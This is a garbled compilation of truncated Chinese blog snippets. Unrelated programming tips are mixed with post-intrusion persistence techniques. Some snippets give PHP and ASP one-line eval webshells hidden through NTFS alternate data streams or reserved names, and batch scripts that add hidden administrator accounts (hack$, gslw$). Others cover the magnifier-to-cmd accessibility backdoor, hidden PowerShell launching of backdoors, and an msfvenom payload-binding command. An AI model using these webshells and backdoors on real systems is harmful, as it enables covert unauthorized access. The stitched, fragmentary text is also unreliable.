0X01 前言 未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法. 0X02 利用ADS隐藏webshell 关于ADS的介绍,就不再阐述,详见尾部参考资料. PHP 一句话木马:<?php @eval($_POST['chopper']);?>,当然也可以直接制作免杀PHP一句话,毕竟PHP千变万化,从变量,数组,赋值,运算,函数等,各种变种... 制作步骤一:创建ADS隐藏文件 在服务器上

NTFS Alternate Data Stream(ADS)   1993年微软推出了基于流行的NT平台的Windows NT操作系统.之后,NTFS作为WIndows开发基于NT的操作系统时的首选文件系统,逐步取代被应用于旧版Windows操作系统(比如Windows 9x)的文件系统,即FAT(File Access Table).   NTFS中的备用数据流(Alternate Data Stream,ADS)允许将一些元数据嵌入文件或是目录,而不需要修改其原始功能或内容.   在NTF

导读 Windows 10 至发布以来就内置集成了 Windows Defender 安全防护应用,但有许多用户平常压根儿就没注意到它的存在.微软为了使安全防护功能更加明显,Windows 10 周年更新中将 Windows Defender 图标列到了任务栏通知区域,以方便用户使用. 禁用任务栏图标并不会影响到 Windows Defender 的正常工作,它仍会在后台对系统进行安全防护,你可以正常通过「设置」—「更新和安全」—「Windows Defender」或在「开始」菜单中搜索 Win

原文:C# 隐藏 Windows Phone 侦错模式中萤幕右上角的数据条(模拟器.实机可用),截图好方便. 一般我们在开发Windows Phone App时,会使用模拟器或是实体的手机开发,在Visual Studio 开发下不论是使用[Release]或是[Debug]执行时,模拟器跟实体手机右上角都会出现数据栏( 官方文件称 : Frame rate counters ),这些数据栏可以帮主开发者知道APP的使用状况,Whatever,若我们开发的APP非常简单的功能,并不会涉及[Out

ref:https://xz.aliyun.com/t/1098/ 这里所说的core_pattern 指的是:/proc/sys/kernel/core_pattern. 我们知道在Linux系统中,如果进程崩溃了,系统内核会捕获到进程崩溃信息,然后将进程的coredump 信息写入到文件中,这个文件名默认是core,但是也可以通过配置修改这个文件名.比如可以通过修改/proc/sys/kernel/core_pattern 文件的内容来指定. Linux man 手册上关于core_patt

利用开机账户登录“轻松访问”创建Windows后门 实验原理: 利用登录账户界面的“轻松访问”中的“放大镜”,把它替换为cmd.exe程序,实现在不登录的情况下打开命令提示符,并进行一些操作(打开的cmd的权限为系统管理员权限). 实验步骤: 一.图形化操作 1.找到Magnify.exe(放大镜),尝试重命名,提示没有权限,是因为该程序的所有者不是当前用户 2.把当前程序的所有者修改为当前用户 3.修改完程序的所有者之后,就可以对该程序进行操作了,这里先备份一下Magnify.exe,方便以后

在实际应用中遇到类似下列需要: 隐藏windows窗口,在windows任务栏中窗口不可见,但应用程序在后台运行. windows应用程序的窗口默认会在任务栏中添加一个可见的窗口项,方便用户操作和在不同应用程序中切换. 考虑到windows操作系统是基于shell的,查找shell的接口资料会发现 ITaskbarList interface .ITaskbarList提供了AddTab和DeleteTab函数,用于向任务栏中添加删除窗口项. 第一种方法就是使用ITaskbarList接口,在程

原文:揭秘Windows系统的四个后门 组策略欺骗后门 创建一个批处理文件add.bat,内容是: @echo off net user hack$ test168 /add net localgroup administrators hack$ /add exit (2)利用 上传运行gpedit.msc,定位到“计算机配置一>Windows设置一>脚本(启动/关机)”, 双击右边窗口的“关机”,在其中添加add.bat. 这样就实现了当系统关机时创建hack$用户,及时被删了,关机时又会再

Windows10的设置里面有很多我们不想看见的项目,例如"轻松使用","隐私","游戏","Cortana"等,我们可以使用组策略或注册表来将其隐藏. 方法一:配置组策略 打开组策略编辑器,在左侧导航窗格中定位至"计算机配置 - 管理模板 - 控制面板",在右侧窗格中可以看到"设置页面可见性"策略项. 双击该设置项打开"设置页面可见性"策略配置窗口.指定要在系统设置

嗅探欺骗: 在目标机上安装嗅探工具窃取管理员的密码 放大镜替换: 构造批处理: @echo off net user gslw$ test168 /add net localgroup administrators gslw$ /add %Windir%\system32\nagnify.exe exit转换exe文件: battoexe等工具文件替换: @echo off copy %Windir%\system32\dllcache\magnify.exe nagnify.exe copy

这个问题事实上已经遇到过好几次了.但又没有特别的须要手动勾选,所以也一直都没在意. 今天研究了一下,原来是由于我删除了Start方法...... 所以.仅仅要脚本中没有Start方法,勾选框就会隐藏掉...

有时候需要对单选框和复选框进行美化,就需要在<input type="radio">和<input type="checkbox">元素的外层包裹label元素.隐藏input元素,display:none: visibile 在iput元素上添加change,click事件,在谷歌 火狐中都运行很好,但是在ie中所有事件不起作用 解决办法: 方法1: 不隐藏input元素,设置input元素的透明度. opacity: 1;-ms-filt

运行后门时,有些后门不能中断.双击运行这种后门会产生一个黑框. 一条命令就能使其在后台执行 命令解释: start-process启动一个进程 -windowstyle窗口样式 hidden隐藏

函数是运行特定任务的代码自包括块. 给定一个函数名称标识, 当运行其任务时就能够用这个标识来进行"调用". Swift的统一的功能语法足够灵活来表达不论什么东西,不管是甚至没有參数名称的简单的C风格的函数表达式,还是须要为每一个本地參数和外部參数设置复杂名称的Objective-C语言风格的函数. 參数提供默认值,以简化函数调用,并通过设置在输入输出參数,在函数运行完毕时改动传递的变量. Swift中的每一个函数都有一个类型,包含函数的參数类型和返回类型.您能够方便的使用此类型像不论什

常见捆绑注入payload手法 Payload捆绑注入 注入exe型+编码: msfvenom -a <arch> --plateform <platform> -p <payload> <payload options> -e <encoder option> -i <encoder times> -x <template> -k <keep> -f <format> -o <path>

文件的基本操作 文件读写: 文件的读写满足以下3个步骤: 1).打开文件 2).操作数据(读.写) 3).关闭文件 --> 不要忘记 1).打开文件: python的open() 方法用于打开一个文件,并返回文件对象,此文件对象在python中是一个特殊的类型,它用于在python程序中对外部的文件进行操作.在python中一切都是对象,file也不例外,file有file的方法和属性.先来看如何创建一个file对象:file(name[, mode[, buffering]]),file()函

译者:zzzhhh 这篇文章是来自SEC Consult Vulnerability Lab的ReneFreingruber (@ReneFreingruber),分享了过去几年从各种博客文章中收集的或者是他自己发现的文件系统技巧,这些技巧不可以直接被利用.但是它们会在特殊情况下间接地产生可以被攻击者利用的漏洞. 请注意,这篇文章只说明有关于如何利用这些问题以及影响的信息(没有关于Windows API的技术底层细节),因为这样会超出本篇文章的技术范围. 第一个文件系统技巧(技巧1 - CVE-

NTFS交换数据流(Alternate Data Streams,简称ADS)是NTFS磁盘格式的一个特性,在NTFS文件系统下,每个文件都可以存在多个数据流.通俗的理解,就是其它文件可以“寄宿”在某个文件身上,而在资源管理器中却只能看到宿主文件,找不到寄宿文件.利用ADS数据流,我们可以做很多有趣的事情. 一.ADS数据流文件的创建 在NTFS分区创建ADS数据流文件有两种形式:一是指定宿主文件:二是创建单独的ADS文件.常用的创建命令有两个:echo和type. 1.创建指定宿主文件的ADS

1.利用保留字隐藏 windows系统有些保留文件夹名,windows系统不允许用这些名字命名文件夹,如 aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt 我们可以在cmd下这么做: echo "<%eval request("joker")%>" >> d:\test.asp cop

1.事件背景 近日,使用广泛的PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门,安恒应急响应中心和研究院随即对国内下载站点提供下载的phpStudy安装包进行分析,确认phpStudy2016.phpStudy2018的部分版本有后门,建议使用该版本的用户立即进行安全加固处理. 2.后门分析 通过分析,后门代码存在于\ext\php_xmlrpc.dll模块中,至少有2个版本: phpStudy2016和phpStudy2